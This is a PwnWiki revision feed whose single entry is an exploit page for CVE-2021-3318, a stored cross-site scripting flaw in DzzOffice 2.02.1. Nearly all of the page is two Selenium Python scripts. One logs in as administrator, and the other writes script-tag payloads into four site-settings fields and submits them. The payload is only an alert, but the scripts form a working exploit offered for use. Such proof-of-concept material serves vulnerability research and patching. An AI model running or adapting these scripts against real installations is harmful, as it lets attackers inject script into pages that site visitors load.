<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2021-3318_DzzOffice_2.02.1_XSS%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2021-3318 DzzOffice 2.02.1 XSS漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2021-3318_DzzOffice_2.02.1_XSS%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2021-3318_DzzOffice_2.02.1_XSS%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T01:52:24Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2021-3318_DzzOffice_2.02.1_XSS%E6%BC%8F%E6%B4%9E&amp;diff=1887&amp;oldid=prev</id>
		<title>Pwnwiki: 建立內容為「==XSS== &lt;pre&gt; # Exploit Title: DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS) # Author: @nu11secur1ty # Testing and Debugging: @nu11secur1ty, g3ck0dr1v3…」的新頁面</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2021-3318_DzzOffice_2.02.1_XSS%E6%BC%8F%E6%B4%9E&amp;diff=1887&amp;oldid=prev"/>
		<updated>2021-04-24T01:35:47Z</updated>

		<summary type="html">&lt;p&gt;建立內容為「==XSS== &amp;lt;pre&amp;gt; # Exploit Title: DzzOffice 2.02.1 - &amp;#039;Multiple&amp;#039; Cross-Site Scripting (XSS) # Author: @nu11secur1ty # Testing and Debugging: @nu11secur1ty, g3ck0dr1v3…」的新頁面&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==XSS==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)&lt;br /&gt;
# Author: @nu11secur1ty&lt;br /&gt;
# Testing and Debugging: @nu11secur1ty, g3ck0dr1v3r&lt;br /&gt;
# Date: 04/23/2021&lt;br /&gt;
# Vendor: http://www.dzzoffice.com/&lt;br /&gt;
# Link: https://github.com/zyx0814/dzzoffice&lt;br /&gt;
# CVE: CVE-2021-3318&lt;br /&gt;
&lt;br /&gt;
[+] Exploit Source:&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python3&lt;br /&gt;
# Author: @nu11secur1ty&lt;br /&gt;
# CVE-2021-3318&lt;br /&gt;
&lt;br /&gt;
from selenium import webdriver&lt;br /&gt;
import time&lt;br /&gt;
import os&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#enter the link to the website you want to automate login.&lt;br /&gt;
website_link=&amp;quot;http://localhost/dzzoffice/user.php?mod=login&amp;quot;&lt;br /&gt;
&lt;br /&gt;
#enter your login username&lt;br /&gt;
username=&amp;quot;admin@dzzoffice.com&amp;quot;&lt;br /&gt;
&lt;br /&gt;
#enter your login password&lt;br /&gt;
password=&amp;quot;password&amp;quot;&lt;br /&gt;
&lt;br /&gt;
#enter the element for username input field&lt;br /&gt;
element_for_username=&amp;quot;email&amp;quot;&lt;br /&gt;
#enter the element for password input field&lt;br /&gt;
element_for_password=&amp;quot;password&amp;quot;&lt;br /&gt;
#enter the element for submit button&lt;br /&gt;
element_for_submit=&amp;quot;loginsubmit&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# Dai brauzura aaa ta eba&lt;br /&gt;
browser = webdriver.Chrome() #uncomment this line,for chrome users&lt;br /&gt;
&lt;br /&gt;
# Otvarai da ne vlazam s kasata&lt;br /&gt;
browser.get((website_link))&lt;br /&gt;
&lt;br /&gt;
# Run...&lt;br /&gt;
try:&lt;br /&gt;
username_element = browser.find_element_by_name(element_for_username)&lt;br /&gt;
username_element.send_keys(username)&lt;br /&gt;
password_element  = browser.find_element_by_name(element_for_password)&lt;br /&gt;
password_element.send_keys(password)&lt;br /&gt;
&lt;br /&gt;
### Login&lt;br /&gt;
signInButton = browser.find_element_by_name(element_for_submit)&lt;br /&gt;
signInButton.click()&lt;br /&gt;
&lt;br /&gt;
### Exploit&lt;br /&gt;
#time.sleep(3)&lt;br /&gt;
element_for_natrutvanie=&amp;quot;admin_password&amp;quot;&lt;br /&gt;
laina=&amp;quot;http://localhost/dzzoffice/admin.php?mod=appmarket&amp;amp;op=cloudappmarket&amp;quot;&lt;br /&gt;
browser.get((laina))&lt;br /&gt;
&lt;br /&gt;
### Next level... :)&lt;br /&gt;
os.system(&amp;quot;python poc_login_1.py&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
print(&amp;quot;payload is deployed_0...\n&amp;quot;)&lt;br /&gt;
except Exception:&lt;br /&gt;
&lt;br /&gt;
#### This exception occurs if the element are not found in the webpage.&lt;br /&gt;
print(&amp;quot;Some error occured :(&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
### os.system&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python3&lt;br /&gt;
# Author: @nu11secur1ty&lt;br /&gt;
# CVE-2021-3318&lt;br /&gt;
&lt;br /&gt;
from selenium import webdriver&lt;br /&gt;
import time&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#enter the link to the website you want to automate login.&lt;br /&gt;
website_link=&amp;quot;http://localhost/dzzoffice/admin.php?mod=setting&amp;quot;&lt;br /&gt;
&lt;br /&gt;
#enter your login username&lt;br /&gt;
username=&amp;quot;admin@dzzoffice.com&amp;quot;&lt;br /&gt;
&lt;br /&gt;
#enter your login password&lt;br /&gt;
password=&amp;quot;password&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#enter the element for username input field&lt;br /&gt;
element_for_username=&amp;quot;admin_email&amp;quot;&lt;br /&gt;
&lt;br /&gt;
#enter the element for password input field&lt;br /&gt;
element_for_password=&amp;quot;admin_password&amp;quot;&lt;br /&gt;
&lt;br /&gt;
#enter the element for submit button&lt;br /&gt;
element_for_submit=&amp;quot;submit&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# Dai brauzura aaa ta eba&lt;br /&gt;
browser = webdriver.Chrome() #uncomment this line,for chrome users&lt;br /&gt;
&lt;br /&gt;
# Otvarai da ne vlazam s kasata&lt;br /&gt;
browser.get((website_link))&lt;br /&gt;
&lt;br /&gt;
# Run...&lt;br /&gt;
try:&lt;br /&gt;
username_element = browser.find_element_by_name(element_for_username)&lt;br /&gt;
username_element.send_keys(username)&lt;br /&gt;
password_element  = browser.find_element_by_name(element_for_password)&lt;br /&gt;
password_element.send_keys(password)&lt;br /&gt;
&lt;br /&gt;
### Login&lt;br /&gt;
signInButton = browser.find_element_by_name(element_for_submit)&lt;br /&gt;
signInButton.click()&lt;br /&gt;
&lt;br /&gt;
### Exploit&lt;br /&gt;
time.sleep(3)&lt;br /&gt;
element_for_natrutvanie=&amp;quot;settingsubmit&amp;quot;&lt;br /&gt;
laina=&amp;quot;http://localhost/dzzoffice/admin.php?mod=setting&amp;quot;&lt;br /&gt;
browser.get((laina))&lt;br /&gt;
&lt;br /&gt;
### Inner text...&lt;br /&gt;
browser.execute_script(&amp;quot;document.querySelector('[name=\&amp;quot;settingnew[metakeywords]\&amp;quot;]').value = '&amp;lt;script&amp;gt;alert(\&amp;quot;nu11secur1ty_is_here\&amp;quot;);&amp;lt;/script&amp;gt;'&amp;quot;)&lt;br /&gt;
browser.execute_script(&amp;quot;document.querySelector('[name=\&amp;quot;settingnew[sitebeian]\&amp;quot;]').value = '&amp;lt;script&amp;gt;alert(\&amp;quot;nu11secur1ty_is_here\&amp;quot;);&amp;lt;/script&amp;gt;'&amp;quot;)&lt;br /&gt;
browser.execute_script(&amp;quot;document.querySelector('[name=\&amp;quot;settingnew[metadescription]\&amp;quot;]').value = '&amp;lt;script&amp;gt;alert(\&amp;quot;nu11secur1ty_is_here\&amp;quot;);&amp;lt;/script&amp;gt;'&amp;quot;)&lt;br /&gt;
browser.execute_script(&amp;quot;document.querySelector('[name=\&amp;quot;settingnew[statcode]\&amp;quot;]').value = '&amp;lt;script&amp;gt;alert(\&amp;quot;nu11secur1ty_is_here\&amp;quot;);&amp;lt;/script&amp;gt;'&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
time.sleep(5)&lt;br /&gt;
&lt;br /&gt;
# Submit exploit&lt;br /&gt;
signInButton = browser.find_element_by_name(element_for_natrutvanie)&lt;br /&gt;
signInButton.click()&lt;br /&gt;
&lt;br /&gt;
print(&amp;quot;payload is deployed_1...\n&amp;quot;)&lt;br /&gt;
except Exception:&lt;br /&gt;
&lt;br /&gt;
#### This exception occurs if the element are not found in the webpage.&lt;br /&gt;
print(&amp;quot;Some error occured :(&amp;quot;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>